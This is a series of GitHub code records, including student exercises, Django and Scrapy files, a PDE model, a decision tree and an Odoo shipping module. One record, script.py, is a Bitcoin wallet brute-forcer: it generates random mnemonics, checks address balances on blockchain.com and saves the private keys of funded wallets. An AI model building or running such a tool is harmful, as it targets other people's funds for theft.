introducido es un número, en caso de que no lo sea seguirá pidiendo input hasta que el usuario meta un número\n\twhile numeroDecimal.isdigit() == False:\n\t\tnumeroDecimal = input(\"Incorrecto. Introduce un nº decimal: \")\n\n\t#Comprobamos que el número introducido es un decimal, en caso de que no lo sea seguirá pidiendo input hasta que el usuario meta un número decimal\n\twhile \".\" in numeroDecimal or \",\" in numeroDecimal:\n\t\tnumeroDecimal = input(\"Incorrecto. 
Introduce un nº decimal: \")\n\n\t##llamamos a la función que va a convertir el número decimal en binario, pasamos el número introducido por el usuario a entero para poder hacer las operaciones precisas\n\tcodigoBinario = convierte_binario(int(numeroDecimal))\n\n\t##mostramos en pantalla\n\tprint(\"El nº \" + numeroDecimal + \" en codigo binario es: \" + codigoBinario)\n\tprint(\" \")\n\t##preguntamos al usuario si quiere convertir otro número\n\tconvertir = input(\"¿Quieres convertir otro número?(S/N)\")\t\n\n##Si no quiere seguir convistiendo nos depedimos\nprint(\"Agur!\")\n\n\n\n","repo_name":"igorbustinza/theegg_ai","sub_path":"tarea24/tarea24.py","file_name":"tarea24.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16524832991","text":"#Faça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, \n#sabendo que a decisão é sempre pelo mais barato.\n\nproduto1= float(input('digite o preço do primeiro produto: '))\n\nproduto2= float(input('digite o preço do segundo produto: '))\n\nproduto3= float(input('digite o preço do terceiro produto: '))\n\nmenorPreco=produto1\nnumeroProduto = 1\n\nif produto2 < menorPreco:\n menorPreco = produto2\n numeroProduto = 2\n\n\nif produto3 < menorPreco:\n menorPreco = produto3\n numeroProduto = 3\n\nprint('Você deve comprar o produto', numeroProduto, 'porque é o mais barato.')\n\n#if é uma condição para o produto e o if sera verificado individualmente","repo_name":"jomaatheus/Facisa","sub_path":"exercicios/exercicio_3/questao7.py","file_name":"questao7.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14238276568","text":"#!/usr/bin/python3\n\n# Imports\nimport sys\nimport time\nfrom bip_utils import Bip39MnemonicGenerator, Bip39SeedGenerator\nfrom bip_utils import Bip44, Bip44Changes, Bip44Coins\nfrom bip_utils import Bip49\nfrom bip_utils import Bip84\n#from utils import *\nfrom bs4 import BeautifulSoup\nimport requests as req\nfrom time import perf_counter\n\nfile = open(\"file_key.txt\",\"a+\") \n\n#\n# Constants\n#\n\n# Allowed arguments\nALLOWED_ARGS = (\"bip44\", \"bip49\", \"bip84\")\n# Map from argument to Bip class type\nARG_TO_BIP_CLASSES = { \"bip44\" : Bip44, \"bip49\" : Bip49, \"bip84\" : Bip84 }\n# Number of words to generate mnemonic\nMNEMONIC_WORDS_NUM = 12\n# Account index for keys derivation\nACCOUNT_IDX = 0\n# Chain type for keys derivation\nCHANGE_TYPE = Bip44Changes.CHAIN_EXT\n# Number of address to be check for a wallet\nADDRESS_MAX_NUM = 20\n# Time to sleep after each address check\nSLEEP_TIME = 0.3\n\n#\n# Functions\n#\n\n# Validate arguments\ndef query(address,bip_obj_mst,mnemonic,bip_obj_acc):\n url=\"https://www.blockchain.com/btc/address/\"+address\n page=req.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n a=soup.find_all('span',class_=\"sc-1ryi78w-0 cILyoi sc-16b9dsl-1 ZwupP u3ufsr-0 eQTRKC\")\n count=0\n for i in a:\n for j in i:\n count+=1\n if(count==6):\n # print(i.contents[0].split(\" \")[0])\n print(\"balance is \"+i.contents[0].split(\" \")[0]+ \" for \"+address)\n if float(i.contents[0].split(\" \")[0]): # comment line 26 and 27 if u dont want to stop if balance is greater than 0 for an address \n file.writelines(\"Mnemonic: %s\" % mnemonic)\n file.writelines(\"\\n\")\n file.writelines(\"Master key WIF : %s\" % bip_obj_mst.PrivateKey().ToWif())\n 
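# record the remaining derived keys so a funded wallet can be recovered later\n                    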
file.writelines(\"\\n\")\n file.writelines(\"Master key : %s\" % bip_obj_mst.PrivateKey().ToExtended())\n file.writelines(\"\\n\")\n file.writelines(\"Account private key: %s\" % bip_obj_acc.PrivateKey().ToExtended())\n file.writelines(\"\\n\")\n file.writelines(\"Account public key : %s\" % bip_obj_acc.PublicKey().RawUncompressed().ToHex())\n file.writelines(\"\\n\")\n file.writelines(\"Scanning the first %d addresses...\" % ADDRESS_MAX_NUM)\n file.writelines(\"\\n --------- \\n\")\n \n\ndef validate_args(argv):\n return len(argv) == 1 and argv[0] in ALLOWED_ARGS\n\n# Print usage\ndef print_usage():\n print(\"Usage:\")\n print(\" python main.py <BIP_CLASS>\")\n print(\"Where BIP_CLASS = bip44, bip49 or bip84\")\n print(\"Example:\")\n print(\" python main.py bip44\")\n\n# Main function\ndef main(argv):\n # Check if arguments are valid\n if not validate_args(argv):\n print_usage()\n sys.exit(1)\n\n # Get BIP class to be used from argument\n bip_class = ARG_TO_BIP_CLASSES[argv[0]]\n\n itr_num = 1\n stop = False\n # Main loop\n while not stop:\n # Generate random mnemonic\n mnemonic = Bip39MnemonicGenerator().FromWordsNumber(MNEMONIC_WORDS_NUM)\n # Generate seed from mnemonic\n seed_bytes = Bip39SeedGenerator(mnemonic).Generate()\n # Generate master key from seed\n bip_obj_mst = bip_class.FromSeed(seed_bytes,Bip44Coins.BITCOIN)\n # Generate account keys\n bip_obj_acc = bip_obj_mst.Purpose().Coin().Account(ACCOUNT_IDX)\n # Generate chain keys\n bip_obj_chain = bip_obj_acc.Change(CHANGE_TYPE)\n # Print\n print(\"******************** ITERATION %d ********************\" % itr_num)\n print(\"Mnemonic: %s\" % mnemonic)\n print(\"Master key WIF : %s\" % bip_obj_mst.PrivateKey().ToWif())\n print(\"Master key : %s\" % bip_obj_mst.PrivateKey().ToExtended())\n print(\"Account private key: %s\" % bip_obj_acc.PrivateKey().ToExtended())\n print(\"Account public key : %s\" % bip_obj_acc.PublicKey().RawUncompressed().ToHex())\n print(\"Scanning the first %d addresses...\" % ADDRESS_MAX_NUM)\n\n\n # Check the addresses\n i = 0\n while i < ADDRESS_MAX_NUM and not stop:\n try:\n # Derive address keys\n bip_obj_addr = bip_obj_chain.AddressIndex(i)\n # Get address string\n addr_str = bip_obj_addr.PublicKey().ToAddress().strip()\n query(addr_str,bip_obj_mst,mnemonic,bip_obj_acc)\n\n \n i += 1\n\n # Error in generating address keys\n except Exception:\n i += 1\n print(\"Unable to save address data to file\")\n\n # Sleep some time\n time.sleep(SLEEP_TIME)\n\n\n# Execute main\nif __name__ == \"__main__\":\n try:\n main(sys.argv[1:])\n # Stop if CTRL+C is pressed\n except KeyboardInterrupt:\n file.close()\n print(\"CTRL+C pressed, stopping...\")\n","repo_name":"shibu130/bip44-bip39-bip84-wallet-gen-and-query","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26194422600","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom recipes.models import FavoriteRecipe, ShoppingCart\nfrom users.models import Subscription, User\n\n\nclass FavoriteInline(admin.TabularInline):\n model = FavoriteRecipe\n\n\nclass ShoppingCartInline(admin.TabularInline):\n model = ShoppingCart\n\n\nclass SubscriptionInline(admin.TabularInline):\n model = Subscription\n fk_name = 'subscriber'\n\n\n@admin.register(User)\nclass UserAdmin(UserAdmin):\n list_filter = ('email', 'username')\n inlines = [FavoriteInline, ShoppingCartInline, 
SubscriptionInline]\n","repo_name":"v-sinitsin/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6457284654","text":"import os\nimport sys\n\nsys.path.append('E:\\\\Escritorio\\\\Trabajo\\\\Proyectos Django\\\\NewsScrap\\\\newsscrap')\n\nimport django\nfrom twisted.internet.task import LoopingCall\nfrom twisted.internet import reactor\nfrom scrapy.selector import Selector\nfrom django.apps import AppConfig\nfrom scrapy.spiders import Rule\nfrom scrapy.crawler import CrawlerRunner\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",'newsscrap.settings.local')\ndjango.setup()\nfrom applications.publico.models import NoticiasPublico\n\n\n\nclass ExtractorPublico(CrawlSpider, AppConfig):\n\n name = \"Noticias\"\n\n custom_settings = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\"\n }\n start_urls = ['https://www.publico.es/politica#analytics-cabecera-comprimida:submenu']\n\n download_delay = 2\n\n rules = (\n Rule(\n LinkExtractor(\n allow=r'l#analytics-seccion:listado'\n ),follow=True, callback=\"parse_noticias\"\n ),\n )\n\n def parse_noticias(self, response):\n \n response = Selector(response)\n\n enlace = response.xpath(\"//body/@data-url\")\n\n titulo = response.xpath(\"//h1/text()\")\n\n imagen = response.xpath(\"//img[@class='ImagenAperturaClick']/@src\")\n\n descripcion = response.xpath(\"//div[@class='article-header-epigraph col-12']/h2/text()\")\n \n datos = NoticiasPublico(\n titulo = titulo.get(),\n descripcion = descripcion.get(),\n url = \"https://www.publico.es\"+enlace.get(),\n imagen = \"https://www.publico.es\"+imagen.get()\n )\n \n datos.save()\n \n print('Noticias extraidas')\n\n\nrunner = CrawlerRunner()\ntask = LoopingCall(lambda: runner.crawl(ExtractorPublico))\ntask.start(7200)\nreactor.run()","repo_name":"JahelCuadrado/NewsScrap","sub_path":"newsscrap/static/publico/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40075707735","text":"import logging, urllib, gzip, requests, json, csv, os, tempfile\nfrom odoo import api, models, fields, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom . 
import consignor_request\nfrom ppretty import ppretty\n\n_logger = logging.getLogger(__name__)\n\nclass ProviderConsignor(models.Model):\n _inherit = 'delivery.carrier'\n\n delivery_type = fields.Selection(selection_add=[('consignor', \"Consignor\")], ondelete={'consignor': 'cascade'})\n\n # TODO Set the needed properties for interacting with the Consignor API\n consignor_server_url = fields.Char(string=\"Server URL\")\n consignor_server_key = fields.Char(string=\"Key\")\n consignor_actor_id = fields.Char(string=\"Account ID\")\n consignor_categ_id = fields.Many2one('product.category', ondelete='cascade')\n consignor_test_mode = fields.Boolean(default=True, string=\"Test Mode\", help=\"Uncheck this box to use production Consignor Web Services\")\n\n # This was removed in Odoo 10, but is used by this plugin\n partner_id = fields.Many2one('res.partner', string='Transporter Company', help=\"The partner that is doing the delivery service.\")\n consignor_product_prod_csid = fields.Integer(related=\"product_id.consignor_product_prod_csid\", string=\"Product CSID\")\n\n def load_consignor_actor(self):\n _logger.info(\"load_consignor_actor\")\n\n url = self.consignor_server_url\n values = {'actor': self.consignor_actor_id,\n 'key': self.consignor_server_key,\n 'command': 'GetProducts'}\n data = urllib.parse.urlencode(values).encode(\"utf-8\")\n response = requests.get(url, data=data)\n\n # import pdb;pdb.set_trace()\n ### Testing Purpose ###\n # Simulator URL: http://consignorsupport.no/testbench/ShipmentServer.aspx\n # values1 = {'actor': \"63\",\n # 'key': \"sample\",\n # 'command': 'GetProducts'}\n # data1 = urllib.parse.urlencode(values).encode(\"utf-8\")\n # url1 = \"http://sstest.consignor.com/ship/ShipmentServerModule.dll\"\n # response = requests.get(url1, data=data1)\n\n res = response.json()\n\n # Reading the Carriers information\n for Carrier in res.get('Carriers'):\n carrier_partner_id = self.insert_update_carrier(Carrier)\n\n # Reading the SubCarrier information - This is the high level services offered by the Carrier\n for SubCarrier in Carrier['Subcarriers']:\n sub_carrier_csid = SubCarrier['SubcarrierCSID']\n try:\n sub_carrier_concept_id = SubCarrier['SubcarrierConceptID']\n except KeyError:\n sub_carrier_concept_id = None\n sub_carrier_name = SubCarrier['SubcarrierName']\n _logger.info(str(sub_carrier_name))\n\n # Reading the product information within each service offered by the Carrier\n for Product in SubCarrier['Products']:\n product_prod_csid = Product['ProdCSID']\n try:\n product_prod_concept_id = Product['ProdConceptID']\n except KeyError:\n product_prod_concept_id = None\n\n product_prod_name = Product['ProdName']\n _logger.info(\" - \" + str(product_prod_name))\n\n if not self.consignor_test_mode:\n # Now we are able to create the delivery product in Odoo\n delivery_product = self.env['product.product'].search([('consignor_sub_carrier_csid', '=',\n sub_carrier_csid), ('consignor_product_prod_csid', '=', product_prod_csid )])\n if not delivery_product:\n _logger.info(\"Insert product\")\n vals = {\n 'name': sub_carrier_name + \" - \" + product_prod_name,\n 'type': 'service',\n 'invoice_policy': 'order',\n 'purchase_method': 'receive',\n 'list_price': 0.00,\n 'consignor_sub_carrier_csid': sub_carrier_csid,\n 'consignor_product_prod_csid': product_prod_csid\n }\n delivery_product = self.env['product.product'].create(vals)\n delivery_product_supplier = self.env['product.supplierinfo'].create({'name': carrier_partner_id,\n 'company_id': 1,\n 'product_id': 
delivery_product.id})\n\n else:\n _logger.info(\"Update product\")\n vals = {\n 'name': sub_carrier_name + \" - \" + product_prod_name,\n 'type': 'service',\n 'invoice_policy': 'order',\n 'purchase_method': 'receive',\n 'consignor_sub_carrier_csid': sub_carrier_csid,\n 'consignor_product_prod_csid': product_prod_csid\n }\n delivery_product.write(vals)\n\n # Insert or update the Delivery product in Delivery Carrier model\n delivery_carrier = False\n try:\n delivery_carrier = self.env['delivery.carrier'].search([('product_id', '=', delivery_product.id),\n ('partner_id', '=', carrier_partner_id)])\n # break\n except ValueError:\n _logger.info('product_id not found')\n\n if not delivery_carrier:\n _logger.info(\"Insert carrier\")\n vals = {\n 'name': sub_carrier_name,\n 'delivery_type': 'consignor',\n 'product_id': delivery_product.id,\n 'partner_id': carrier_partner_id,\n 'consignor_server_url': self.consignor_server_url,\n 'consignor_server_key': self.consignor_server_key,\n 'consignor_actor_id': self.consignor_actor_id\n }\n delivery_carrier = self.env['delivery.carrier'].create(vals)\n _logger.info(delivery_carrier.id)\n else:\n _logger.info(\"Delivery carrier update\")\n vals = {\n 'name': sub_carrier_name,\n 'delivery_type': 'consignor',\n 'product_id': delivery_product.id,\n 'partner_id': carrier_partner_id,\n 'consignor_server_url': self.consignor_server_url,\n 'consignor_server_key': self.consignor_server_key,\n 'consignor_actor_id': self.consignor_actor_id\n }\n delivery_carrier.write(vals)\n\n\n return []\n\n def insert_update_carrier(self,Carrier=[]):\n # Insert or update the Carrier information in res.partner model\n carrier_partner = self.env['res.partner'].search([('consignor_carrier_csid', '=', Carrier['CarrierCSID'])])\n if not carrier_partner:\n _logger.info(\"Insert \" + str(Carrier['CarrierFullName']))\n vals = {\n 'company_type': 'company',\n 'name': Carrier['CarrierFullName'],\n 'consignor_carrier_csid': Carrier['CarrierCSID'],\n 'consignor_carrier_full_name': Carrier['CarrierFullName'],\n 'consignor_carrier_short_name': Carrier['CarrierShortName']\n }\n if not self.consignor_test_mode:\n carrier_partner = self.env['res.partner'].create(vals)\n _logger.info(carrier_partner.id)\n else:\n _logger.info(\"Update \" + str(Carrier['CarrierFullName']))\n\n return carrier_partner.id\n\n def consignor_rate_shipment(self, orders):\n return {\n \"success\": True,\n \"price\": self.product_id.list_price,\n \"error_message\": False,\n \"warning_message\": False,\n }\n\n def consignor_send_shipping(self, pickings):\n # Save Shipment or Submit Shipment?\n # If Save Shipment, implement a new Status,\n res = []\n\n for picking in pickings:\n _logger.info(\"Creating Consignor shipment for picking \" + str(picking.id) + \" (\" + str(picking.name) + \")\")\n\n # _logger.info(ppretty(picking.carrier_id, seq_length=25))\n\n senderAddress = {}\n senderAddress['Kind'] = '2'\n senderAddress['Name1'] = picking.company_id.name\n senderAddress['Street1'] = picking.company_id.street\n senderAddress['Street2'] = picking.company_id.street2 or \"\"\n senderAddress['PostCode'] = picking.company_id.zip\n senderAddress['City'] = picking.company_id.city\n senderAddress['CountryCode'] = picking.company_id.country_id.code\n\n receiverAddress = {}\n receiverAddress['Kind'] = '1'\n receiverAddress['Name1'] = picking.partner_id.name\n receiverAddress['Street1'] = picking.partner_id.street\n receiverAddress['Street2'] = picking.partner_id.street2 or \"\"\n receiverAddress['PostCode'] = picking.partner_id.zip\n 
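# the remaining receiver fields follow the same pattern: city, country and contact details\n            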
receiverAddress['City'] = picking.partner_id.city\n receiverAddress['CountryCode'] = picking.partner_id.country_id.code\n receiverAddress['Mobile'] = picking.partner_id.mobile or picking.partner_id.phone or \"\"\n receiverAddress['Email'] = picking.sale_id.partner_id.email or picking.partner_id.email\n\n lines = [\n {\n \"PkgWeight\": int(_convert_weight(picking.shipping_weight, \"GR\")) or 1000,\n \"Pkgs\": [\n {\"ItemNo\": 1}\n ]\n }\n ]\n\n submitshipment_data = {}\n submitshipment_data['OrderNo'] = picking.origin\n submitshipment_data['Kind'] = '1'\n submitshipment_data['ActorCSID'] = self.consignor_actor_id\n submitshipment_data['ProdCSID'] = picking.carrier_id.consignor_product_prod_csid\n #submitshipment_data['Addresses'] = '[' + json.dumps(receiverAddress) + ']'\n #submitshipment_data['Addresses'] = '[' + json.dumps(senderAddress) + '],[' + json.dumps(receiverAddress) + ']'\n submitshipment_data['Addresses'] = [senderAddress, receiverAddress]\n submitshipment_data['Lines'] = lines\n\n submitshipment_data['References'] = [\n {\n \"Kind\" : 53,\n \"Value\" : \"Z1\"\n },\n {\n \"Kind\" : 257,\n \"Value\" : \"Z1_doc\" \n }\n ]\n\n json_data = json.dumps(submitshipment_data)\n _logger.info(\"Saving shipment to Consignor\")\n _logger.info(json_data.encode('UTF-8'))\n\n url = self.consignor_server_url\n values = {'actor': self.consignor_actor_id,\n 'key': self.consignor_server_key,\n 'command': 'SubmitShipment',\n 'data': json_data,\n 'options': '{\"Labels\": \"none\", \"UseLocalPrint\": \"1\"}'}\n\n data = urllib.parse.urlencode(values).encode(\"utf-8\")\n response = requests.get(url, data=data)\n\n # _logger.info(response.text)\n js_res = json.loads(response.text)\n\n if \"ErrorMessages\" in js_res:\n raise UserError(\"Error message from Consignor: \" + \", \".join(js_res[\"ErrorMessages\"]))\n\n tmpTracking = \"\"\n try:\n tmpTracking = js_res[\"Lines\"][0][\"Pkgs\"][0][\"PkgNo\"]\n except:\n _logger.info(\"No PkgNo found\")\n\n try:\n tmpTracking = js_res[\"ShpNo\"]\n except:\n _logger.info(\"No ShpNo found\")\n\n _logger.info(tmpTracking)\n\n res = res + [{'tracking_number': tmpTracking, 'exact_price': self.product_id.list_price}]\n\n # Dir = tempfile.mkdtemp()\n # tmp_dir = os.path.join(Dir, \"export\")\n # os.mkdir(tmp_dir)\n\n # report_name = picking.origin + \".csv\"\n # report_dir = os.path.join(\"/tmp\", report_name)\n\n filename = str(picking.id)\n if picking.origin:\n filename = (picking.origin).replace(\"/\",\"_\")\n else:\n filename = (picking.name).replace(\"/\",\"_\")\n \n with open('/odoo/export/' + filename + '.csv', \"w\", newline=\"\") as f:\n fieldnames = ['name', 'street', 'street2', 'postcode', 'city', 'countrycode', 'email', 'mobile', 'ordernumber', 'shipmentid', 'carrier', 'shippingproduct', 'weight', 'consignorid', 'trackingreference']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n\n writer.writeheader()\n writer.writerow({\n 'name': picking.partner_id.name.encode('ISO 8859-1'),\n 'street': picking.partner_id.street.encode('ISO 8859-1'),\n 'street2': picking.partner_id.street2 and picking.partner_id.street2.encode('ISO 8859-1') or \"\",\n 'postcode': picking.partner_id.zip.encode('ISO 8859-1'),\n 'city': picking.partner_id.city.encode('ISO 8859-1'),\n 'countrycode': picking.partner_id.country_id.code.encode('ISO 8859-1'),\n 'email': (picking.sale_id.partner_id.email or picking.partner_id.email).encode('ISO 8859-1'),\n 'mobile': (picking.partner_id.mobile or picking.partner_id.phone or \"\").encode('ISO 8859-1'),\n 'ordernumber': 
picking.origin.encode(\"ISO 8859-1\"),\n 'shipmentid': picking.name.encode(\"ISO 8859-1\"),\n 'carrier': self.name.encode(\"ISO 8859-1\"),\n 'shippingproduct': self.product_id.name.encode(\"ISO 8859-1\"),\n 'weight': int(_convert_weight(picking.shipping_weight, \"GR\")) or 1000,\n 'consignorid': js_res[\"ShpCSID\"],\n 'trackingreference': tmpTracking.encode(\"ISO 8859-1\")\n })\n # shutil.rmtree(Dir, ignore_errors=False, onerror=None)\n\n# print json.dumps(res).encode(\"UTF-8\")\n return res\n\n def consignor_get_tracking_link(self, pickings):\n res = []\n return res\n\n def consignor_cancel_shipment(self, picking):\n res = []\n return res\n\n\ndef _convert_weight(weight, unit='KG'):\n ''' Convert picking weight (always expressed in KG) into the specified unit '''\n if unit == 'KG':\n return weight\n elif unit == 'GR':\n return weight * 1000.0\n else:\n raise ValueError\n","repo_name":"korvolles/odoo-consignor","sub_path":"models/delivery_consignor.py","file_name":"delivery_consignor.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31594075804","text":"import numpy as np\nimport h5py\nimport numba as nb\nimport os\nfrom time import time\nfrom pathlib import Path\nimport pde\nfrom pde.tools import mpi\nfrom pde.solvers import Controller\nfrom pde.solvers.explicit_mpi import ExplicitMPISolver\n\nfrom h5py_utils import write_field\n\n\nclass ModelPDE(pde.PDEBase):\n def __init__(\n self,\n bc,\n terrain,\n nu=10 / 3,\n eta=3.5,\n rho=0.95,\n gamma=50 / 3,\n delta_b=1 / 30,\n delta_w=10 / 3,\n delta_h=1e-2 / 3,\n a=33.33,\n q=0.05,\n f=0.1,\n p=0.5,\n ):\n self._nu = nu\n self._eta = eta\n self._rho = rho\n self._gamma = gamma\n self._delta_b = delta_b\n self._delta_w = delta_w\n self._delta_h = delta_h\n self._a = a\n self._q = q\n self._f = f\n self._p = p\n\n self._bc = bc\n self._terrain = terrain\n\n def _make_pde_rhs_numba(self, state):\n a = self._a\n q = self._q\n f = self._f\n eta = self._eta\n nu = self._nu\n rho = self._rho\n gamma = self._gamma\n delta_b = self._delta_b\n delta_w = self._delta_w\n delta_h = self._delta_h\n p = self._p\n\n laplace = state.grid.make_operator(\"laplace\", bc=self._bc)\n grad = state.grid.make_operator(\"gradient\", bc=self._bc)\n div = state.grid.make_operator(\"divergence\", bc=self._bc)\n zeta = self._terrain.split_mpi()\n zeta = zeta.data\n\n @nb.jit\n def pde_rhs(state_data, t):\n # state\n b, w, h = state_data\n\n modified_terrain = h + zeta\n j = -2 * delta_h * h * grad(modified_terrain)\n\n rate = np.empty_like(state_data)\n # Calculate constants\n L2 = np.float_power(1 + eta * b, 2)\n gb = nu * w * L2\n gw = gamma * b * L2\n i = a * (b + q * f) / (b + q)\n\n # Calculate time derivatives\n rate[0] = gb * b * (1 - b) - b + delta_b * laplace(b)\n rate[1] = i * h - nu * (1 - rho * b) * w - gw * w + delta_w * laplace(w)\n rate[2] = p - i * h - div(j)\n\n return rate\n\n return pde_rhs\n\n def evolution_rate(self, state: pde.FieldBase, t: float = 0) -> pde.FieldBase:\n b, w, h = state\n\n # Calculate constants\n i = self._a * (b + self._q * self._f) / (b + self._q)\n l2 = np.float_power(1 + self._eta * b, 2)\n gb = self._nu * w * l2\n gw = self._gamma * b * l2\n\n zeta = self._terrain.split_mpi()\n modified_terrain = h + zeta\n j = -2 * self._delta_h * h * modified_terrain.gradient(self._bc)\n\n # Calculate time derivatives\n b_t = gb * b * (1 - b) - b + self._delta_b * b.laplace(self._bc)\n w_t = (\n i * h\n - self._nu * (1 - self._rho * b) * 
w\n            - gw * w\n            + self._delta_w * w.laplace(self._bc)\n        )\n        h_t = self._p - i * h - j.divergence(self._bc)\n\n        return pde.FieldCollection([b_t, w_t, h_t])\n\n\ndef run_simulation(output: Path, n: int, tmax: int, L: int, percipitation: float, slope: float):\n    # define constants for simulation\n    dx = L / n\n    dt = 0.5 * np.power(dx, 2) * 1e-1\n    shape = (n, n)\n    grid_range = [(0, L), (0, L)]\n    if mpi.is_main:\n        print(f\"dt: {dt:.3e}, dx: {dx:.3e}, n: {n}, range: {grid_range}\")\n\n    # create the problem to solve\n    grid = pde.CartesianGrid(grid_range, shape, periodic=[True, False])\n    terrain = pde.ScalarField(grid, np.fromfunction(lambda _, y: y * slope, shape))\n\n    bc_zero_derivative = {\"derivative\": 0}\n    bc_zero_flux = {\"value\": 0}\n    bc_periodic = \"auto_periodic_neumann\"\n    bc = [bc_periodic, [bc_zero_flux, bc_zero_derivative]]\n\n    eq = ModelPDE(bc, terrain, p=percipitation)\n    solver = ExplicitMPISolver(eq)\n    storage = pde.FileStorage(output)\n\n    b = pde.ScalarField.random_uniform(grid, 0, 1e-6)\n    w = pde.ScalarField(grid, eq._p / eq._nu)\n    h = pde.ScalarField(grid, eq._p / eq._a)\n    state = pde.FieldCollection([b, w, h])\n\n    controller = Controller(\n        solver, t_range=tmax, tracker=[\"progress\", storage.tracker(1)]\n    )\n    controller.run(state, dt=dt)\n    \n    # write_field(output, terrain.data, \"terrain\")\n    \n    if mpi.is_main:\n        with h5py.File(output, \"a\") as f:\n            f.create_dataset(\"terrain\", data=terrain.data)\n            f.create_dataset(\"dx\", data=dx)\n            f.create_dataset(\"dt\", data=dt)\n            f.create_dataset(\"p\", data=percipitation)","repo_name":"yohad/water-connectivity-pypde","sub_path":"water_connectivity/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39999091154","text":"import numpy as np\n\nFLT_EPSILON = np.finfo(float).eps\nPYTHON_MAX_RECURSION_DEPTH = 1000\n\nclass DecisionTreeRegressor:\n    def __init__(self, max_depth=PYTHON_MAX_RECURSION_DEPTH, criterion=\"mse\"):\n        self.max_depth = max_depth\n        self.criterion = criterion\n        self.tree = None\n        self.n_features = None\n\n    def fit(self, X, y):\n        self.n_features = X.shape[1]\n        self.tree = self.build_tree(X, y, 0)\n\n    def predict(self, X):\n        predictions = np.array([self.predict_one(x) for x in X])\n        return predictions\n\n    def predict_one(self, x):\n        node = self.tree\n        while isinstance(node, dict):\n            if x[node[\"feature\"]] <= node[\"thresh\"]:\n                node = node[\"left\"]\n            else:\n                node = node[\"right\"]\n        return node\n\n    def sample_equal(self, X):\n        if len(X) == 0:\n            return True\n        temp = X[0]\n        for x in X:\n            if any(x != temp):\n                return False\n        # only report equality after every sample has been compared\n        return True\n\n    def build_tree(self, X, y, depth):\n        if len(np.unique(y)) == 1 or self.sample_equal(X):\n            return np.mean(y)\n        if depth >= self.max_depth:\n            return np.mean(y)\n\n        best_feature, best_thresh = self.find_best_split(X, y)\n        left_X, left_y, right_X, right_y = self.split_data(X, y, best_feature, best_thresh)\n\n        if len(left_X) > 0 and len(right_X) > 0:\n            left_tree = self.build_tree(left_X, left_y, depth+1)\n            right_tree = self.build_tree(right_X, right_y, depth + 1)\n        else:\n            left_tree = np.mean(y)\n            right_tree = np.mean(y)\n\n\n        return {\"feature\": best_feature, 'thresh': best_thresh, 'left': left_tree, \"right\": right_tree}\n\n    def find_best_split(self, X, y):\n\n        best_feature = None\n        best_thresh = None\n\n        if self.criterion == \"mse\":\n            best_mse = np.inf\n            for feature in range(self.n_features):\n                feature_vals = np.unique(X[:, feature])\n                for val in 
feature_vals:\n left_indices = np.where(X[:, feature] <= val)\n right_indices = np.where(X[:, feature] > val)\n mse_result = self.mse_delta(y, left_indices, right_indices)\n\n if mse_result < best_mse:\n best_mse = mse_result\n best_feature = feature\n best_thresh = val\n else:\n raise Exception(\"Unknown criterion! Please use 'mse'\")\n return best_feature, best_thresh\n\n def mse_delta(self, y, left_indices, right_indices):\n left_indices = left_indices[0]\n right_indices = right_indices[0]\n p = len(left_indices) / len(y)\n return p * self.mse(y[left_indices]) + (1 - p) * self.mse(y[right_indices])\n\n def mse(self, y):\n if len(y) == 0:\n return 0\n else:\n return np.var(y)\n\n def split_data(self, X, y, feat, thresh):\n left_indices = np.where(X[:, feat] <= thresh)[0]\n right_indices = np.where(X[:, feat] > thresh)[0]\n left_X = X[left_indices]\n left_y = y[left_indices]\n right_X = X[right_indices]\n right_y = y[right_indices]\n return left_X, left_y, right_X, right_y\n\n","repo_name":"SleepyVirino/AI_AL","sub_path":"myml/tree/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73017306115","text":"from django.db import models\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n# The Profile class extends Django's default user model.\nclass Profile(models.Model):\n \"\"\"\n The Profile class is used to associate a profile with a new user.\n The profiles adds additional information to the end user like:\n - The user's title\n - The user's residence country\n - The user's phone\n - The user's affiliation\n \"\"\"\n TITLE_CHOICES = (\n ('Dr', 'Dr'),\n ('Professor', 'Professor'),\n ('Miss', 'Miss'),\n ('Mr', 'Mr'),\n ('Mrs', 'Mrs'),\n ('Ms', 'Ms')\n )\n # There are packages for this but, meh.\n COUNTRY_CHOICES = (\n ('Romania', 'Romania'),\n ('United States', 'United States'),\n ('Afghanistan', 'Afghanistan'),\n ('Albania', 'Albania'),\n ('Algeria', 'Algeria'),\n ('Andorra', 'Andorra'),\n ('Angola', 'Angola'),\n ('Argentina', 'Argentina'),\n ('Armenia', 'Armenia'),\n ('Australia', 'Australia'),\n ('Austria', 'Austria'),\n ('Azerbaijan', 'Azerbaijan'),\n ('Bahamas', 'Bahamas'),\n ('Bahrain', 